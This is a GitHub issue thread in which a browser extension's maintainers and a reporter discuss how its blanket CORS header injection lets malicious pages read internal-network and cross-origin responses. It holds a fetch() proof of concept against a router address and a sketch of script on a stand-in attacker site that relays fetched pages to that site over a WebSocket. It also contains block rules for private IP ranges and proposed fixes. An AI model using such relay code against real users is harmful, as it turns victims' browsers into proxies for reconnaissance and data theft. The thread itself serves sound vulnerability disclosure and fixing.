
Indiscriminate injection of "Access-Control-Allow-Origin: *" is unsafe #21

Open · tartpvule opened this issue Jan 21, 2019 · 23 comments
Labels: bug (Something isn't working), enhancement (New feature or request)

@tartpvule

Proof of concept:
fetch('http://192.168.1.1/')
  .then(function (response) { return response.text(); })
  .then(function (text) { alert('fulfilled\n\n' + text); })
  .catch(function (e) { alert('rejected\n\n' + String(e)); });
In the absence of other filtering extensions (e.g. uMatrix), this extension, by default, allows an arbitrary webpage to send GET requests to and read responses from sites it should not.
While vanilla Firefox allows sending GET requests to an arbitrary URL, it only allows the response to be readable by the requesting origin if the target host explicitly allows it.
(Tested on Firefox ESR 60.4.0)

@claustromaniac
Owner

claustromaniac commented Jan 21, 2019

This extension does not inject Access-Control-Allow-Origin: * indiscriminately. Would you be kind enough to explain how doing that is unsafe? Please do so after reading the documentation, though.

Thanks in advance.

EDIT: re-reading your post, is your concern about local servers specifically?

@tartpvule
Author

tartpvule commented Jan 21, 2019

My concerns are primarily about servers in the internal network, yes.

From the documentation in "Is this extension safe?":

Why do I say this is safe? Because this only touches GET requests (and preflight requests for GET requests), and when it does, it always sets the Access-Control-Allow-Origin to *. When a request is altered this way, it only succeeds as long as it was not flagged as having credentials. Firefox aborts the request and throws a (healthy) yellow warning in the console otherwise.
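In webRequest terms, the injection being discussed boils down to roughly the following (a minimal sketch of the general technique for illustration only, not the extension's actual code):

// Minimal sketch: set Access-Control-Allow-Origin: * on GET responses.
// This is NOT the extension's real implementation, just the general technique.
browser.webRequest.onHeadersReceived.addListener(
  details => {
    if (details.method !== 'GET') return;
    const headers = details.responseHeaders.filter(
      h => h.name.toLowerCase() !== 'access-control-allow-origin'
    );
    headers.push({ name: 'Access-Control-Allow-Origin', value: '*' });
    return { responseHeaders: headers };
  },
  { urls: ['<all_urls>'] },
  ['blocking', 'responseHeaders']
);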

But "GET requests that are not flagged as having credentials" are enough to do some reconnaissance on the user's internal network. This is particularly concerning in the case of home users with poorly secured "smart" devices.

I may have chosen the word "indiscriminate" poorly; please bear with me here.
From /src/bg/webRequest.js, my impression is that "Access-Control-Allow-Origin: *" is injected into all requests the extension processes, without the kind of fine-grained user control that rules in extensions like uMatrix provide.
For instance, I do not think that forcing "Access-Control-Allow-Origin: *" for all request types is a good idea; "font" is less risky in this respect than "xmlhttprequest", in my opinion.
So, "indiscriminate" in the sense of "not doing things differently for the varying risks in request types, URLs involved, returning content types".
My opinion on this is "Let the user do the discriminating himself/herself".

Thank you

@claustromaniac
Owner

claustromaniac commented Jan 21, 2019

Alright, thanks.

For starters, I think it would make sense for the extension to simply ignore all requests to internal networks. I'm considering the idea of giving users the choice of doing so only when the origin server is not in an internal network, but I'm not sure if that is worthwhile or not. Probably not.

As for your second point, I believe the remaining potential risks related to XHR-type requests can only materialize when making a cross-origin request to a badly designed and/or outdated server, and as stated in the documentation, those risks should be easily mitigated by using first-party isolation and/or containers. I'm all for letting users choose, but I need to draw some lines to prevent the complexity from growing to a point where it messes with user-friendliness. Also, I generally try to stick to minimalism because it makes projects maintainable, and it is the most effective way to avoid introducing bugs and vulnerabilities.

From your perspective, what would be an ideal way for the extension to give you those choices?

claustromaniac added a commit that referenced this issue Jan 22, 2019
Fixes a non-critical vulnerability: requests to loopback/private addresses should be ignored. See #21
@claustromaniac
Owner

claustromaniac commented Jan 22, 2019

For the time being, I released 1.4.1b1/1.4.1b2 to address the first issue (private networks).

@tartpvule
Author

I do not think there is a way to reliably discern internal networks from external networks from Firefox WebExtensions. IP addresses are the easy cases. But a hostname like "some-department.a-certain-institution.gov" might be resolved by the internal DNS server to a local address.
The only way to do this, I think, is to leave it to the user to decide the patterns himself/herself.

But then, while the scenario I tested is about attack reconnaissance into the internal network, it is not the only impact of this issue, as it effectively allows a remote web server to use visitors' browsers as a kind of limited HTTP GET proxy.
Scenario: Origin A uses fetch() to GET a URL (without the ability to send querystrings or authorizations) from origin B, then pipe the response to a WebSocket service in origin A.
Standard same-origin policy disallows reading the response from origin B by origin A unless an Access-Control-Allow-Origin header from origin B explicitly allows it.
So, I think this is a serious vulnerability. It is not limited to a misconfigured origin B either: the mere fact that the browser can be used as a proxy, even one limited to credential-less GETs, to reach a "politically sensitive" site on behalf of a hypothetical malicious actor is bad enough.

I propose:

  1. Only known "safe and unlikely to break" (user decides) request types are processed at all by this extension, maybe just "font" and "stylesheet" by default. This should cover Google Fonts and the like, with low risk of breaking anything else.
  2. A rule list for advanced users to dictate which origin is allowed to access which origin. Let the user unbreak websites by himself/herself, like uMatrix. In other words, allow the user to decide precisely when to inject "Access-Control-Allow-Origin: *".
  3. For requests processed by the extension, if the server-supplied Access-Control-Allow-Origin header is stricter than "*", then leave it alone by default, but allow the user to decide if/when to override it.
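The third point could look roughly like this inside a header-rewriting handler (a hypothetical sketch that assumes response headers are available as an array of {name, value} objects, not a patch against the actual code):

// Hypothetical sketch for proposal 3: only inject '*' when the server sent no
// Access-Control-Allow-Origin header at all; a stricter server-supplied value is kept.
function maybeInjectACAO(responseHeaders) {
  const existing = responseHeaders.find(
    h => h.name.toLowerCase() === 'access-control-allow-origin'
  );
  if (existing) return responseHeaders;   // the server made its own choice; leave it alone
  responseHeaders.push({ name: 'Access-Control-Allow-Origin', value: '*' });
  return responseHeaders;
}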

Thank you

@claustromaniac
Owner

claustromaniac commented Jan 22, 2019

I do not think there is a way to reliably discern internal networks from external networks from Firefox WebExtensions.

There is. The DNS API. But not everyone would want that. In the vast majority of cases it would end up being just unnecessary overhead. EDIT: It still might be worthwhile to add it as an option (default off).
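For reference, such a check would look roughly like this (a hedged sketch; it assumes the "dns" permission and that the extension's existing isReservedAddress() helper accepts plain IP literals):

// Sketch only: resolve the target host and check whether any answer is a
// loopback/private address. Requires the "dns" permission in the manifest.
async function resolvesToReservedAddress(hostname) {
  try {
    const record = await browser.dns.resolve(hostname);
    return record.addresses.some(addr => isReservedAddress(addr));
  } catch (err) {
    return false;   // resolution failed; treat the host as public
  }
}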

The only way to do this, I think, is to leave it to the user to decide the patterns himself/herself.

I understand the following is not your preferred way to do this, but in case anyone else is wondering, this can already be done by using the Exclusions section. For example:

* *.a-certain-institution.gov

Will ignore requests from any origin to any host that ends in .a-certain-institution.gov.

So, I think this is a serious vulnerability.

I still disagree. It may be a serious vulnerability to you, depending on your threat model, but for most people this would at worst be an edge case. An adversary attempting that would have to be targeting this extension specifically, and apart from that risk of giving them access to "politically sensitive" information, I can't think of many other ways for this to be exploited in the wild (assuming well-configured target servers and/or using first-party isolation/containers).

As for your proposals...

  1. ✔️
  2. You do realize that this would make the extension unusable for most people, right?
  3. There are only three ways for Access-Control-Allow-Origin to be stricter than *:
    • No Access-Control-Allow-Origin at all. This is what the extension is expecting in most scenarios in its current form.
    • Access-Control-Allow-Origin: null tries to achieve the same as above, but is worse.
    • Access-Control-Allow-Origin that doesn't match the value of Origin. I have yet to come across a single case where this happens, but I agree that it would make sense to leave these alone.

Anyway, I appreciate all your valuable feedback. I will make a small release and then I'll have to do a lot of thinking. I'm sorry to say I can't promise anything, but you made some good points, so I'll try to add that functionality when I can. That being said, it wouldn't be wise for you to expect this extension to become the uMatrix of CORS, especially in terms of UI/UX. Realistically, I doubt I'll ever have the time for making fancy stuff like that.

@crssi
Collaborator

crssi commented Jan 23, 2019

A brainstorm is happening in my head, but I have a question to understand better:
@tartpvule proposed that we do not touch requests whose source IPs are in a private/local address range, right?

@tartpvule
Author

tartpvule commented Jan 23, 2019

@claustromaniac

DNS API

Did not know about that. Learn something new each day, I guess.

... , this can already be done by using the Exclusions section

I think this is acceptable.

I still disagree. It may be a serious vulnerability to you, depending on your threat model, but for most people this would at worst be an edge case.

If this extension gets popular enough (and I really hope it does; it is the only extension that specifically deals with the Origin header, as far as I know), it might turn out to be an attractive target. Elaborations below.

There are only three ways for Access-Control-Allow-Origin to be stricter ...

I agree.

uMatrix of CORS

That's my dream! :)

@crssi No, that is not my intention. No special treatment for servers in the internal network.
For ordinary users, and as the default setting, I proposed only touching the request types whose responses are not exposed any more than vanilla Firefox allows ("stylesheet"), or where the exposed information is minimal anyway ("font").
For advanced users, I proposed allowing complete user control over when to insert "Access-Control-Allow-Origin: *", based on the request type, the Content-Type header, and the URLs involved. In other words, uMatrix for CORS, which I understand is a difficult undertaking (I am not skillful enough for this).

The scenario I started with is one where an origin in the "Internet zone" accesses an origin in the "Intranet zone", which in Firefox would only be possible if the "Intranet zone" server replied with Access-Control-Allow-Origin set to "*" or a sufficiently permissive value. The problem is that POOP inserts that header, allowing access.
Then I realized that this essentially allows the implementation of a (limited) HTTP proxy in Firefox: a mischievous guy might tunnel HTTP GET requests in order to browse ghacks.net, but a bad guy can use the same mechanism to turn unsuspecting browsers into a zombie botnet that scans for unsecured IoT devices with open port 80, or to recon something a targeted user can access but the bad guy cannot due to IP whitelisting or the like. This is the "serious vulnerability" I mentioned in the earlier comment.

Thank you

@crssi
Collaborator

crssi commented Jan 23, 2019

I am really struggling to picture a scenario where you visit an "Internet zone" page, it pulls additional resources from the "Intranet zone", and that is harmful without the attacker being able to inject content at the network level as a MitM. And for that, the "attacker" would already need to be on the "Intranet" network... which would be game over anyway, and exploiting CORS would be pointless.

But I might still not see clearly the scenario/vulnerability vector you have in mind.
Can you paint a clearer picture?

@tartpvule
Author

tartpvule commented Jan 23, 2019

@crssi No MITM needed. Visiting an attacker-controlled domain is enough.
Consider the following scenario:

  1. A bad guy lures an unsuspecting user to an attacker-controlled website, e.g. a hacked blog, a dodgy warez site, a script-kiddie site, via a link click, an iframe, etc.
  2. That attacker-controlled website (let's say www.evil-guy.com for the purpose of this example) serves up a Javascript application that does the following (sketched just after this list):
    2.1 Open a WebSocket to an attacker-controlled NodeJS server on evil-guy.com
    2.2 fetch() the URLs as directed by the WebSocket channel (like the one on my first post).
    2.3 Send the results of response.text() over WebSocket to the bad guy.
  3. Profit!
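Steps 2.1 to 2.3 are only a handful of lines; a rough sketch of the in-page half (hypothetical WebSocket endpoint, no error handling):

// Rough sketch of the in-page half of such a proxy. The /tunnel endpoint is hypothetical.
const ws = new WebSocket('wss://www.evil-guy.com/tunnel');
ws.onmessage = async (event) => {
  const url = event.data;                              // URL pushed by the attacker's server
  const response = await fetch(url);                   // readable only because ACAO: * was injected
  ws.send(JSON.stringify({ url, body: await response.text() }));
};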

Normally, step 2.3 is only possible if the fetch()ed response contains an Access-Control-Allow-Origin permitting it, which is what this bug is about. Note that www.evil-guy.com is in "Internet zone" and the URLs can be any host, either "Intranet zone" (http://some-department.a-certain-institution.gov/) or "Internet zone" (http://www.ghacks.net/).
The attacker-controlled NodeJS server could then stitch the WebSocket channel with an HTTP proxy server implementation: Attacker's Browser -> NodeJS HTTP Proxy -> WebSocket Channel -> User's Browser -> fetch()
The scenario I investigated is the case where this is used to go through the private IP address space (192.168.*.*, and others), which on my test home network allows fetching my router's login page, which contains enough clues to infer the make and model of the device. Granted, this is not a complete compromise of the device, but it makes information about my home network available that would not have been available to an attacker otherwise; in other words, "reconnaissance".
Now imagine a future where this extension gets very popular, think uBlock Origin level of popular: a botnet of browsers doing fetch() for an enterprising bad guy becomes possible.

For the MITM in the local network case, it is "game over" like you said, but only for the MITMed HTTP traffic. Modern versions of Firefox, I think, block mixed content in this case by default.
But MITMs further away, like "The Great Firewall of China", are only "game over" for traffic crossing that MITM. There is no effect on communications between America and Japan, other than the fact that the "attacker-controlled website" is essentially the whole of China.

Hope that clarifies things.

@crssi
Collaborator

crssi commented Jan 24, 2019

Thank you, much better for my lazy brain. 😸

By default this WE does not touch POST requests, and in relaxed mode it only touches GET requests for fonts and CSS.
We can agree that not touching requests is safe so...
I would suggest that "Exclude root domain matches" should be enabled by default.
This way we achieve two things:

  1. It eliminates the scenario above whenever domain names (or FQDNs) are used for the destination (most cases) rather than IP probing.
  2. It eliminates possible breakage.

I would also add the following to the Exclusions by default:
*.youtube.com *
*.google*.* *

This should be safe and mostly breakage free for a basic user.
Maybe it would be nice to have the possibility of an external Exclusion list, like uBO has for filter lists and uM for assets. But for simplicity, I would have only one list.
I am prepared to maintain such a list.
With those defaults the WE can cover basic users.

Now for the scenario where a local/private IP would be used...
Hopping into local/private IP space could be a problem, and it is not a new one.
I remember that in the past NoScript had a solution named ABE (Application Boundary E... something).
To avoid such "hopping" I am using uM with the following ATM:

[::1] [::1] * allow
[fe80::1%lo0] [fe80::1%lo0] * allow
* [::1] * block
* [fe80::1%lo0] * block
* [ff02::1] * block
* [ff02::2] * block

* 0 * block
* 10 * block
* 127 * block
* 172.16 * block
* 172.17 * block
* 172.18 * block
* 172.19 * block
* 172.20 * block
* 172.21 * block
* 172.22 * block
* 172.23 * block
* 172.24 * block
* 172.25 * block
* 172.26 * block
* 172.27 * block
* 172.28 * block
* 172.29 * block
* 172.30 * block
* 172.31 * block
* 192.168 * block
* 255.255.255.255 * block
* localhost * block
10 10 * allow
127 127 * allow
172.16 172.16 * allow
172.17 172.17 * allow
172.18 172.18 * allow
172.19 172.19 * allow
172.20 172.20 * allow
172.21 172.21 * allow
172.22 172.22 * allow
172.23 172.23 * allow
172.24 172.24 * allow
172.25 172.25 * allow
172.26 172.26 * allow
172.27 172.27 * allow
172.28 172.28 * allow
172.29 172.29 * allow
172.30 172.30 * allow
172.31 172.31 * allow
192.168 192.168 * allow
localhost localhost * allow

Please note that the IPv6 part of the list above is not thorough, since I have IPv6 disabled, but revisiting the IPv6 ranges to make the list complete (hygienic) is also on my to-do list... like adding fc00::/7 and similar.

@tartpvule could you be so kind as to test your PoC (proof of concept) again, but this time adding the following to the Exclusions list:
* 192.168.*
and maybe another test with this (if the one above fails):
* 192.168.*.*

If the result is good, then we can populate the Exclusions list with all local/private ranges (there are not many).

It could be that I have missed something or am seeing this wrong... I will be more than happy if you correct me in that case.

Thank you and cheers 😄

@tartpvule
Author

First off, I made a mistake: I have been running POOP in Aggressive Mode all this time, and that turns out to be the key. This is due to (what I think is) a bug in /src/bg/webRequest.js.

if (
    mode === 1 &&
    !settings.strictTypes[d.type] && (
        target.searchParams ||
        target.hash ||
        target.username ||
        target.password
    ) || isReservedAddress(target.hostname)
) return;

(There is no " || isReservedAddress(target.hostname)" in the previous version)
The thing is: "target.searchParams" is always truthy, which reduces the statement to "(mode === 1 && !settings.strictTypes[d.type]) || isReservedAddress(target.hostname)".
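A quick way to see why (searchParams is a URLSearchParams object, so it is truthy even when the URL has no query string at all):

// Demonstration of the truthiness issue with URL.searchParams.
const target = new URL('https://example.com/page');
console.log(Boolean(target.searchParams));   // true  -- it is an object, even with no query
console.log(target.search);                  // ""    -- the string form is empty and falsy
console.log(String(target.searchParams));    // ""    -- casting to a string also gives ""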
So this means the issue is only apparent when a) Aggressive Mode is selected, or b) "xmlhttprequest" is checked in the "Type filters" section of the settings. (!!)
Ironically, this means that the default Relaxed Mode with the default "font" and "stylesheet" boxes checked already behaves like number 1 of my proposal a few comments back. (= secure)

@crssi Yes, that exclusion makes fetch('http://192.168.1.1/') fail, which is a good thing.
The new version with isReservedAddress(target.hostname) closed the easy route to brute force the private IPv4 addresses.
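Such a check for IPv4 literals can be quite small; a hypothetical sketch (the extension's real isReservedAddress() may well differ):

// Hypothetical sketch of a reserved-address check, covering plain IPv4 literals only.
function looksReservedIPv4(hostname) {
  const m = hostname.match(/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/);
  if (!m) return false;                        // not a bare IPv4 literal
  const a = Number(m[1]), b = Number(m[2]);
  return a === 10 || a === 127 ||              // 10.0.0.0/8, loopback
         (a === 172 && b >= 16 && b <= 31) ||  // 172.16.0.0/12
         (a === 192 && b === 168) ||           // 192.168.0.0/16
         a === 0;                              // 0.0.0.0/8
}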
I have uploaded my HTTP Proxy-WebSocket PoC to GitHub; try it. It illustrates the remaining problem:
https://github.com/tartpvule/poc-poop-acao/

The attacker-controlled NodeJS server could then stitch the WebSocket channel with an HTTP proxy server implementation: Attacker's Browser -> NodeJS HTTP Proxy -> WebSocket Channel -> User's Browser -> fetch()
... a bot net of browsers doing fetch() for an enterprising bad guy is possible.

Try using it to browse an HTTP site in the "Internet zone". No HTTPS support is implemented.

@crssi
Collaborator

crssi commented Jan 24, 2019

I also wasn't aware that @claustromaniac had already fixed private addresses. 😄
He is Mr. Fantastic. 😄

@claustromaniac
Owner

claustromaniac commented Jan 24, 2019

I would suggest that "Exclude root domain matches" should be enabled by default.

That wouldn't affect the scenarios that @tartpvule laid out.

With those defaults WE can cover basic users.

That's what the relaxed mode is for.

If the result is good, then we can populate Exclusion list with all local/private ranges (there are not many).

There is no need for that, since 1.4.1 already handles the scenario of an origin triggering a request to a private IP address. See c0273c8 and 3900421

First off, I made a mistake: I have been running POOP in Aggressive Mode all this time, and that turns out to be the key. This is due to (I think a bug) in /src/bg/webRequest.js.
...
The thing is: "target.searchParams" is always truthy

That is a bug, but it shouldn't make any difference when it comes to dealing with private addresses, because && binds tighter than || (the whole && chain is evaluated first), so the isReservedAddress() check at the top level still applies either way. The bug you found just causes the extension to ignore more stuff than it should in relaxed mode. I just forgot to cast searchParams to a string. I'll fix that ASAP, thanks.

EDIT: Damn, I didn't read @crssi's last comment before writing mine (sorry).

claustromaniac added a commit that referenced this issue Jan 24, 2019
Fix relaxed mode searchParam condition. Thanks @tartpvule #21 (comment)
@crssi
Collaborator

crssi commented Jan 24, 2019

I would suggest that "Exclude root domain matches" should be enabled by default.

That wouldn't affect the scenarios that @tartpvule layed out.

I know... it is OT. I am just saying that it would be best if this were checked by default... IMHO

EDIT: Damn, I didn't read @crssi's last comment before writing mine (sorry).

😄 why "sorry", no need to be 😸

Cheers

@crssi
Collaborator

crssi commented Jan 24, 2019

It is nice to have someone like @tartpvule participating. 👍

It illustrates the remaining problem

It must be late, since I am not sure that I understand correctly the "remaining problem". 😢

@crssi
Collaborator

crssi commented Jan 24, 2019

@tartpvule
Do you know the project ghacks-user.js?
If not, take a look (and do not miss the "issues" debates too).

@tartpvule
Author

It must be late, since I am not sure that I understand correctly the "remaining problem".

  1. A bad guy lures an unsuspecting user to an attacker-controlled website, e.g. a hacked blog, a dodgy warez site, a script-kiddie site, via a link click, an iframe, etc.
  2. That attacker-controlled website (let's say www.evil-guy.com for the purpose of this example) serves up a Javascript application that does the following:
    2.1 Open a WebSocket to an attacker-controlled NodeJS server on evil-guy.com
    2.2 fetch() the URLs as directed by the WebSocket channel (like the one on my first post).
    2.3 Send the results of response.text() over WebSocket to the bad guy.

Normally, step 2.3 is only possible if the fetch()ed response contains an Access-Control-Allow-Origin permitting it

The attacker-controlled NodeJS server could then stitch the WebSocket channel with an HTTP proxy server implementation: Attacker's Browser -> NodeJS HTTP Proxy -> WebSocket Channel -> User's Browser -> fetch()
... a bot net of browsers doing fetch() for an enterprising bad guy is possible.

You do not normally want someone using your browser as a free proxy/bot, especially if it can be used to implement an illicit Shodan-lite. (Shodan = https://www.shodan.io/)
Try out my https://github.com/tartpvule/poc-poop-acao/

After 449b334, now I want this more than ever...

Only known "safe and unlikely to break" (user decides) request types are processed at all by this extension, maybe just "font" and "stylesheet" by default. This should cover Google Fonts and the like, with low risk of breaking anything else.

There is no need for that, since 1.4.1 already handles the scenario of an origin triggering a request to a private IP address.

That is a step in the right direction, but it is not perfect.

  1. Exclusions must be added for every internal domain a user comes across, for example, *.localdomain, *.local, *.a-certain-institution.gov, *.some-corporation.com. Imagine what someone who works at a lot of places must do then.
  2. It is possible to set up a public domain name that resolves to a private address. The DNS rebinding attack is a superset of this (see Tavis Ormandy's work). Holes in the same-origin policy (like this issue) make an attacker's life much easier, as they make the first half of that attack unnecessary; the functionality achieved is reduced, but it is still enough for reconnaissance. This can be prevented with a filtering DNS proxy that scrubs all answers containing private IP addresses from outside the Intranet, which is not an impossible thing for an IT department.

Do you know the project ghacks-user.js?

Yes, great project; I have been using it in my private builds of Firefox for a few years.
Last year, I got to know about the "Origin header problem" from arkenfox/user.js#509 and https://www.ghacks.net/2019/01/19/privacy-oriented-origin-policy-for-firefox/ led me to this extension.

@crssi
Collaborator

crssi commented Jan 24, 2019

So implementing a DNS API check on top of isReservedAddress(target.hostname) would actually resolve the issue (?).

@claustromaniac
Owner

claustromaniac commented Jan 24, 2019

That is a step in the right direction, but it is not perfect.

I know (I was replying to @crssi, not to you), but it will take a long time for me to implement what you proposed, and I haven't even decided how I'll go about doing that (assuming I even manage to squeeze out the time and motivation to do it in the first place).

@claustromaniac
Owner

So implementing DNS API matching isReservedAddress(target.hostname) would actually resolve the issue (?).

That would require additional permissions, and it would be unnecessary overhead like 99.9999999% of the time. IF I go that route, it will be optional and disabled by default (as I said above).

@crssi
Collaborator

crssi commented Jan 25, 2019

Just my humble opinion:
@claustromaniac
I think there is no hurry.
As it is now, it is safe against drive-by opportunities to exploit the local network by guessing well-known IP ranges.
Browsing normal sites I have never stumbled upon such attacks. I have had the opportunity to see some in the past, while digging for information on Russian "underground" sites.
Exploiting the same vector via hostnames/domains is quite unlikely unless you are a target of particular interest; someone would need to do quite a bit of research to prepare such an exploit and then lure you in.
For sure it would be nice to implement the DNS API for completeness' and hygiene's sake, but not before you are (and only if you are) prepared to do so, so no pushing at all.
@tartpvule I hope I am seeing this right, or do you have other ideas/concerns?

Anyway, I will (possibly) never be able to express the gratitude I feel for you, @claustromaniac, and for the whole ghacks-user.js company. I ❤️ you all.

@tartpvule
Author

@crssi @claustromaniac ... There are two parts to this issue ...

  1. Internal network access

The scenario I started with is one where an origin in the "Internet zone" accesses an origin in the "Intranet zone", which in Firefox would only be possible if the "Intranet zone" server replied with Access-Control-Allow-Origin set to "*" or a sufficiently permissive value. The problem is that POOP inserts that header, allowing access.

I consider this part to be solved (thanks @claustromaniac) after c0273c8 and after adding exclusions as per @claustromaniac's comment: * *.a-certain-institution.gov. The remaining "public domain name with a private IP" case is in "not worse than before" territory, as demonstrated by the DNS rebinding attack, and it is also something a good IT department ought to filter in the first place.
More improvements, namely bullets 2 and 3 of my proposal, are nice to have, but low priority and not particularly sensitive security-wise in my view.

  2. Arbitrary URL access

Then I realized that this essentially allows the implementation of a (limited) HTTP proxy in Firefox: a mischievous guy might tunnel HTTP GET requests in order to browse ghacks.net, but a bad guy can use the same mechanism to turn unsuspecting browsers into a zombie botnet that scans for unsecured IoT devices with open port 80, or to recon something a targeted user can access but the bad guy cannot due to IP whitelisting or the like. This is the "serious vulnerability" I mentioned in the earlier comment.

This is an impact that I realized about two days after opening this issue, which my https://github.com/tartpvule/poc-poop-acao demonstrates. I have successfully browsed http://ghacks.net/ with this PoC proxy implementation. So this is still unsolved.
Before 449b334, this PoC did not work when a) "relaxed (default)" was selected in the Global mode section and b) only "font" and "stylesheet" were checked in the Type filters section of the extension settings page, which, incidentally, is what bullet 1 of my proposal states. Choosing "aggressive mode" makes my PoC work. (!!!)
So now I want something like if (d.type !== 'font' && d.type !== 'stylesheet') { return; } in onBeforeSendHeaders. A settings section dictating "the specific types this extension should touch and nothing else" would be nice to have here.
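A minimal sketch of that kind of early return (hypothetical code, reusing the d.type naming from webRequest.js; the set of allowed types would come from the settings):

// Sketch only: bail out early for every request type the user has not whitelisted.
const touchedTypes = new Set(['font', 'stylesheet']);    // user-configurable default
function onBeforeSendHeaders(d) {
  if (!touchedTypes.has(d.type)) return;                 // leave all other types untouched
  // ... the existing Origin/ACAO logic would go here ...
}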

Thank you

claustromaniac added the bug (Something isn't working) label May 9, 2019
claustromaniac added this to the 1.5.0 milestone May 9, 2019